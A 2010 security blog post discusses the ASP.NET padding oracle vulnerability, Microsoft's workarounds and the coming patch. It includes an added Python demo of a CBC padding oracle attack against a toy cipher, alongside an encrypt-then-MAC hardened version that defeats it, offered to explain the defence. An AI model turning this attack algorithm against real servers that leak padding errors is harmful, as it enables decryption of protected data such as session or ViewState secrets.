There has been quite some discussion (and speculation!) about the ASP.NET padding oracle vulnerability on various blogs around the Internet over the last couple of days. After Microsoft published an advisory on it, the ASP.NET community has been following ScottGu's blog closely.
The issue has seen increasing attention. Yesterday the vulnerability was mentioned on Schneier's blog, which linked to a Threatpost article (Kaspersky's news site) in which the guys behind the exploit were interviewed and the vulnerability and exploit tools were discussed. That article was dated September 13, four days before Microsoft released its first security advisory on the issue. Since then, the amount of information on the vulnerability has only grown throughout the Internet. With so much available from so many different sources, there is not much security through obscurity left.
In today's Kaspersky article on the vulnerability the authors of the exploit state that Microsoft's workarounds are ineffective, and they seem very confident in the effectiveness of their attack. But as long as the attack relies on observing different behaviour over a series of requests to the web server, Microsoft's workarounds (one identical error response for every kind of failure, with a random delay before it is sent) make sense: they remove, or at least blur, the signal the attacker depends on. It's all about maximising the effort an attacker has to put into a successful attack by reducing his chance of success per unit of time. In the demo it took 38 000 web requests before the attack succeeded; anything that doubles the number of requests needed buys valuable time!
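To make concrete why the workarounds target the server's observable behaviour, here is an added example (my own illustration, not Microsoft's code and not the exploit tool discussed in the article): a CBC decryptor whose padding error is visible to the client, the attack that turns that single bit into the plaintext block by block, and the encrypt-then-MAC form that removes the oracle by rejecting any modified ciphertext before the padding is ever examined. The block cipher is a toy Feistel construction over HMAC-SHA256, an assumption that stands in for AES so the script needs only the Python standard library; the key and the plaintext are constructed sample data, and all function names are mine.

```python
"""Padding oracle demo (added example). The block cipher is a toy 4-round Feistel network
over HMAC-SHA256, standing in for AES so this runs on the standard library alone."""
import hashlib, hmac, os

BLOCK, TAG = 16, 32                     # cipher block size; HMAC-SHA256 tag size

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, rnd):                 # Feistel round function: keyed PRF of one half
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, r, rnd))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, l, rnd)), l
    return l + r

def unpad(data):                        # PKCS#7 check; letting this error show is the oracle
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, plaintext):        # returns IV || C1 || ... || Cn
    n = BLOCK - len(plaintext) % BLOCK
    padded, out = plaintext + bytes([n]) * n, [os.urandom(BLOCK)]
    for i in range(0, len(padded), BLOCK):
        out.append(block_encrypt(key, _xor(padded[i:i + BLOCK], out[-1])))
    return b"".join(out)

def cbc_decrypt(key, data):             # P_i = D(C_i) xor C_(i-1), with C_0 = IV
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    return unpad(b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:])))

def padding_oracle_attack(oracle, data):
    """Decrypt IV||C1..Cn knowing only oracle(IV'||C) -> bool ("did the padding check pass?").
    Returns (plaintext, number of oracle queries)."""
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    plain, queries = b"", 0
    for idx in range(1, len(blocks)):
        prev, cur = blocks[idx - 1], blocks[idx]
        inter = bytearray(BLOCK)        # D(cur), recovered right to left
        for pos in range(BLOCK - 1, -1, -1):
            padv = BLOCK - pos          # padding value we try to force at this position
            for g in range(256):
                forged = bytearray(BLOCK)
                forged[pos] = g
                for j in range(pos + 1, BLOCK):
                    forged[j] = inter[j] ^ padv     # already-known bytes are set to padv
                queries += 1
                if not oracle(bytes(forged) + cur):
                    continue
                if padv == 1:           # a hit may be a longer pad (..02 02): disturb the
                    queries += 1        # byte before it; only a genuine 01 still passes
                    if not oracle(bytes(forged[:pos - 1]) + b"\xff" + bytes([g]) + cur):
                        continue
                inter[pos] = g ^ padv
                break
            else:
                raise RuntimeError("no guess accepted: the server is not an oracle")
        plain += _xor(bytes(inter), prev)
    return unpad(plain), queries

def seal(key, plaintext):               # hardened form: encrypt-then-MAC with separate keys
    ek, mk = (hashlib.sha256(key + s).digest() for s in (b"enc", b"mac"))
    body = cbc_encrypt(ek, plaintext)
    return body + hmac.new(mk, body, hashlib.sha256).digest()

def open_sealed(key, data):             # hardened server: every failure gives the same None
    ek, mk = (hashlib.sha256(key + s).digest() for s in (b"enc", b"mac"))
    body, tag = data[:-TAG], data[-TAG:]
    if not hmac.compare_digest(tag, hmac.new(mk, body, hashlib.sha256).digest()):
        return None                     # tampered ciphertext never reaches unpad()
    return cbc_decrypt(ek, body)        # MAC passed, so the padding is known to be good

def demo(secret=b"constructed sample: a ViewState-like secret"):
    key = hashlib.sha256(b"demo key").digest()     # fixed key so the run is repeatable
    def leaky_oracle(msg):              # server whose response differs on a padding error
        try:
            cbc_decrypt(key, msg)
            return True
        except ValueError:
            return False
    recovered, queries = padding_oracle_attack(leaky_oracle, cbc_encrypt(key, secret))
    sealed = seal(key, secret)          # attacker keeps the genuine tag on forged bodies
    try:
        padding_oracle_attack(lambda m: open_sealed(key, m + sealed[-TAG:]) is not None, sealed[:-TAG])
        hardened_leaks = True
    except RuntimeError:
        hardened_leaks = False
    return {"recovered": recovered, "queries": queries, "hardened_leaks": hardened_leaks}
```

Running demo() shows the two sides of the argument: against the leaky server the attack recovers the sample plaintext with, on average, 128 requests per byte and never touches the key, while the same attack against open_sealed() gets the same answer for every forged message and gives up. Making all error responses identical, as the workaround does, aims at the same property without changing the crypto, which is why it helps against this attack but is a stopgap rather than a fix.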
But good news has arrived as I'm writing this: ScottGu just blogged about a security update shipping tomorrow! Honestly, we've been looking forward to this one. I guess a lot of people will spend the next day or two testing the patch. Happy patching! :)
Software security blog by André N. Klingsheim, who's learning to love .NET and Microsoft servers.
Sep 28, 2010